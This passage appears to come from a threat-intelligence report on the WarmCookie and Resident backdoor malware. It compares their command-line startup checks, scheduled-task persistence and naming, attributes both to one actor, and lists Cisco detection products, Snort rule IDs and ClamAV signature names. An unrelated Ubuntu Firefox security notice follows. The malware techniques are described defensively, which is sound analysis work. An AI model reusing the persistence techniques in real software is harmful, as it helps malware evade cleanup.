The overall startup logic is also the same in both Resident backdoor and WarmCookie. At the beginning of the startup process both check to determine if the malware was executed with a command line switch. In the case of the Resident backdoor, it is ‘/p’; in the case of WarmCookie it is ‘/u’. This parameter tells the application whether it is the first instance of itself or if the running version is the former copied version, which was previously made persistent via the Task Scheduler. This prevents multiple scheduled tasks from being created once the malware has achieved persistence.  

__WarmCooke startup logic.__

__Resident backdoor startup logic.__

One slight difference is that Resident uses the hardcoded string ‘RtlUpd’ to generate the filename for the scheduled task, whereas WarmCookie uses a hardcoded list of company names and randomly selects one, as shown below: 

__WarmCookie filename list.__

Based on our analysis of Resident backdoor and WarmCookie, we assess that they were likely developed by the same entity. While there are significant overlaps in the code and functionality implementations across Resident backdoor and WarmCookie, WarmCookie contains significantly more robust functionality and command support compared to Resident backdoor. Additionally, while WarmCookie has typically been deployed as an initial access payload in intrusion activity we have analyzed, Resident backdoor was deployed post-compromise following the deployment of several other components such as WasabiSeed, Screenshotter and AHK Bot.  

Given the differences in functionality and where each is encountered in the attack lifecycle, we classify Resident and WarmCookie as separate malware families that have been developed by the same threat actor. 

**Coverage **

Ways our customers can detect and block this threat are listed below. 

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following Snort rule(s) have been developed to detect activity associated with this malicious activity.  

*   Snort 2 SIDs: 64139, 64140, 64141, 64142, 64143, 64144, 64145, 64146, 64147, 64148, 64149, 64150, 64151, 64152, 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162. 
*   Snort 3 SIDs: 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162, 301044, 301045, 301046, 301047, 301048, 301049, 301050.  

The following ClamAV signatures have been developed to detect activity associated with this malicious activity.  

*   Js.Downloader.Agent-10022279-0  
*   Vbs.Downloader.Agent-10022291-0  
*   Win.Trojan.WasabiSeed-10022304-0  
*   Js.Trojan.Screenshotter-10022306-0  
*   Js.Trojan.Agent-10022307-0  
*   Win.Trojan.Lazy-10022308-0  
*   Win.Trojan.Screenshotter-10022309-0  
*   PUA.Win.Tool.NetPing-10022493-0  
*   Win.Malware.CobaltStrike-10022494-0  
*   PUA.Win.Tool.AutoHotKey-10022305-1  
*   PUA.Win.Tool.RemoteUtilities-9869515-0  
*   PUA.Win.Tool.AdFind-9962378-0   
*   Txt.Downloader.AHKBot-10024463-0  
*   Ps1.Malware.CobaltStrike-10024466-0  
*   Win.Infostealer.Rhadamanthys-10024467-0  
*   Txt.Infostealer.Rhadamanthys-10024468-0  
*   Win.Backdoor.Agent-10025011-0  
*   Vbs.Trojan.Screenshotter-10025015-0  
*   Win.Malware.Warmcookie-10036688-0 
*   Win.Malware.CSsharpStreamer-10036641-0 

**Indicators of Compromise **

Indicators of compromise associated with WarmCookie/BadSpace activity can be found in our GitHub repository here.

Threat Spotlight: WarmCookie/BadSpace

TA866 (also known as Asylum Ambuscade) is a threat actor that has been conducting intrusion operations since at least 2020.

Highlighting TA866/Asylum Ambuscade Activity Since 2021

Ubuntu Security Notice 7078-1 - Atte Kettunen discovered that Firefox did not properly validate before inserting ranges into the selection node cache. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7078-1October 22, 2024firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to crash or run programs as your loginSoftware Description:- firefox: Mozilla Open Source web browserDetails:Atte Kettunen discovered that Firefox did not properly validate beforeinserting ranges into the selection node cache. An attacker could possiblyuse this issue to cause a denial of service or execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         131.0.3+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7078-1  CVE-2024-9936Package Information:  https://launchpad.net/ubuntu/+source/firefox/131.0.3+build1-0ubuntu0.20.04.1

Tag

#firefox